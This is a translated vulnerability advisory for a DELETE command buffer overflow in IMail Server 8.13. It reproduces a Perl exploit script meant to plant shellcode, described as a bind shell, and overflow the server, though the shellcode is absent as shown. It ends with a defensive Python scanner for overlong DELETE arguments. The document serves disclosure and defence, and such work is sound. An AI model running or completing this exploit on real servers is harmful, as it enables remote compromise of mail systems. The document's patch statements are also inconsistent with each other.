One. Note from Email Technology Information Network: This vulnerability was found in IMail Server 8.13. According to reports, it is addressed in IMail Server 8.14 and higher, so please download the latest version or patch promptly. This site made both available for download earlier, at the following addresses:
A) IMail 8.14 download address: http://www.5dmail.net/down/list.asp?id=901
B) IMail 8.14 patch: http://www.5dmail.net/down/list.asp?id=902
Two. The original text is reproduced below:

Description of the Ipswitch IMail program

Ipswitch IMail 8.13 Remote DELETE Command Buffer Overflow Vulnerability

Ipswitch IMail Server is a powerful mail solution. Ipswitch IMail Server handles the DELETE command incorrectly, and remote attackers can use this vulnerability to carry out a buffer overflow attack against the system. Ipswitch IMail lacks a correct buffer boundary check when handling the DELETE command; an authenticated user can submit a DELETE command whose parameters cause arbitrary instructions to be executed on the system.

<* Source: Jerome (Jerome@athias.fr)
   Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110037283803560&w=2 *>

Affected system: Ipswitch IMail 8.13

Attack method:
The following procedure (method) may be used offensively and is provided for security research and teaching only. Use it at your own risk!

Jerome (Jerome@athias.fr) provides the following test method:

    #!/usr/bin/perl -w
    ##################################################
    # ipswitch-imail-8.13-delete
    # discovered by: muts
    # coded by: zatlander
    # www.whitehat.co.il
    ##################################################
    # Credits:
    # - http://www.metasploit.org - HD Moore for the Metasploit shellcode
    # - http://www.edup.tudelft.nl/~bjwever/Menu.html - SkyLined for the alpha ASCII shellcode generator
    # - http://www.hick.org - for the syscall egghunt code in the paper "Understanding Windows Shellcode"
    ##################################################
    use IO::Socket;
    use Getopt::Std;
    use Mail::IMAPClient;

    print "Exploit for the ipswitch imail delete buff overflow\n";
    print "c0d3d by zatlander\n";
    print "Discovered by muts\n";
    print "www.whitehat.co.il\n";
    print "for hacking purposes online";

    # Real shellcode: bind shell on port 4444 (./alpha edx

    # -> pointer to "call [edx+8]" ends up in return address
    # Find an ASCII-safe address pointing to a call [edx+8] for your OS

    # "AAA" aligns ESP with the egghunter shellcode (popad, pop, pop)
    $asciieh = "AAA" . $egghunter;
    $asciisc = "W00TW00T" . $shellcode;

    $email = "From: \"the guy hacking you\"\r\n" .
             "To: \"Poor you\"\r\n" .
             "Subject: $asciisc\r\n" .
             "Date: Wed, 3 Nov 2004 14:45:11 +0100\r\n" .
             "Message-ID: <000101C4C1ACDCNDJ6D69B90\$5E01A8C0\@snorlax>\r\n" .
             "Content-Type: text/plain;\r\n\tcharset=\"us-ascii\"\r\n" .
             "Content-Transfer-Encoding: 7bit\r\n" .
             "\r\n" .
             $asciisc;

    $payload = "A" x 236 . $jmp21 x 3 . $calledx8 . "S" x 29 . $asciieh . "\r\n";

    print "Login in to $host as $usr/$pwd\n";
    my $imap = Mail::IMAPClient->new(Server => $host, User => $usr, Password => $pwd)
        or die "Cannot connect: $@";
    print "Count: " . $imap->message_count("Inbox") . "\n";

    print "Sending egg\n";
    $imap->select("Inbox") or die "Could not select: $@\n";
    my $uid = $imap->append("Inbox", $email) or die "Can not append: $@";
    $msg = $imap->message_string($uid) or die "Cannot get message: $@";
    # $msg = $imap->body_string($uid) or die "Cannot get message: $@";
    # print "Retrieving $uid back: $msg\n";

    print "Overflowing delete\n";
    $imap->delete($payload) or die "Cannot delete: $@\n";

    print("Finished...\n");

Vendor patch:

Ipswitch
--------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's homepage for the latest version: http://www.ipswitch.com/
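
For servers that cannot be upgraded yet, overlong DELETE arguments can be flagged at the IMAP layer. The following is an added example, not part of the original advisory: it measures the mailbox argument of each client DELETE command (atom, quoted string, or announced literal) and reports those above a limit. The 128-byte limit, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumed limit, not from the advisory: ordinary mailbox names are short,
# while the test script pads its DELETE argument with 236 filler bytes.
MAX_MAILBOX_LEN = 128

_LITERAL = re.compile(rb"\{(\d+)\+?\}")  # {n} or {n+}: length announced up front


def delete_arg_length(line: bytes):
    """Return the mailbox-argument length of an IMAP DELETE command, else None."""
    parts = line.rstrip(b"\r\n").split(b" ", 2)
    if len(parts) < 3 or parts[1].upper() != b"DELETE":
        return None
    arg = parts[2]
    literal = _LITERAL.fullmatch(arg)
    if literal:
        # The data follows on later lines; the announced size is enough to judge.
        return int(literal.group(1))
    if len(arg) >= 2 and arg.startswith(b'"') and arg.endswith(b'"'):
        # Quoted string: count the content with backslash escapes resolved.
        return len(re.sub(rb"\\(.)", rb"\1", arg[1:-1]))
    return len(arg)


def scan(lines, limit=MAX_MAILBOX_LEN):
    """Return (line_number, tag, length) for each DELETE argument above limit."""
    hits = []
    for number, line in enumerate(lines, 1):
        length = delete_arg_length(line)
        if length is not None and length > limit:
            tag = line.split(b" ", 1)[0].decode("ascii", "replace")
            hits.append((number, tag, length))
    return hits


# Constructed client-to-server lines, not captured traffic.
SAMPLE = [
    b"a001 LOGIN alice secret\r\n",
    b"a002 SELECT Inbox\r\n",
    b'a003 DELETE "Old/Receipts 2004"\r\n',
    b"a004 DELETE " + b"A" * 300 + b"\r\n",
    b"a005 DELETE {512}\r\n",
    b'a006 delete "' + b"B" * 40 + b'"\r\n',
]

if __name__ == "__main__":
    for number, tag, length in scan(SAMPLE):
        print(f"line {number}: tag {tag} DELETE argument of {length} bytes")
```

The same check can sit in an IMAP proxy or run over logged client commands; commands it flags should be rejected or reviewed before they reach an unpatched server.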